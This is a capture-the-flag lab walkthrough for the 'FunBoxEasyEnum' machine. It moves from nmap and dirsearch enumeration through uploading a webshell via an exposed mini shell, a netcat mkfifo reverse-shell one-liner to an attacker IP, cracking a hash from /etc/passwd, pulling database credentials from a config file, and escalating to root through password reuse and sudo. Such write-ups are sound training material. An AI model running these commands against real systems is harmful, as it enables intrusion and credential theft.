FunBoxEasyEnum
Nmap
sudo nmap 192.168.68.132 -p- -sS -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Hitting port 80 we come to an Apache default installation page. Viewing the source of this page reveals no interesting information.

We now move onto enumerating with dirsearch.py
. First running seclists big.txt against the target.
python3 dirsearch.py -u http://192.168.68.132/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -r -R 2 --full-url -t 75

We view robots.txt and find it contains contains:
Allow: Enum_this_Box
I ran dirsearch.py
against this and was unable to find anything further. Viewing /phpmyadmin
and attempting to login with default credentials shows we are unable to proceed with the default root account.

Running dirsearch.py again on the target this time using the --suffix
parameter to append .php to all entries we find /mini.php
.
python3 dirsearch.py -u http://192.168.68.132/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -r -R 2 --full-url -t 75 --suffix=.php

Browsing to /mini.php
we come to Zerion Mini Shell 1.0. As per below I uploaded a webshell as webshell.php

Knowing that the above files exist in the root directory I then browsed to /webshell.php and was able to execute commands confirming we are running as www-data.

Running the command which nc
shows we have netcat
installed on the target machine. I set up a netcat
listener on my target machine then run the following command on the webshell:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.49.68 80 >/tmp/f
Resulting in a reverse shell.

Upgrade the shell:
/usr/bin/script -qc /bin/bash /dev/null
Checking /etc/passwd shows the user 'oracle' has a password hash in the file.

I then took the hash and run it under mode 500 on Hashcat
on my Windows host which cracked the password as: hiphop

I then used su
to switch to the user 'oracle' and was successful switching.

After poking about on the oracle user for a bit I could not find anything interesting. I tried the hiphop password against other users and no luck. I decided to move back onto www-data so I can read some files in /etc/phpmyadmin.
I disconnected the shell and run the initial exploit on the web shell to get connect as www-data. Moving into /etc/phpyadmin
and then reading read the config-db.php file we see credential information.

We find the credentials phpmyadmin:tgbzhnujm!
I then logged in MySQL and was unable to identify interesting information in the contained databases.
From here I starting throwing the passwords at the users in the /home/
directory until I got a match on the user 'karla'.

Knowing this worked I excited the shell and logged into SSH
with the same information just so we have all the advantages of a SSH
shell.

Checking sudo -l
we see Karla can run any command as anyone. For a nice easy root shell we can run the command below:
sudo /bin/bash

Last updated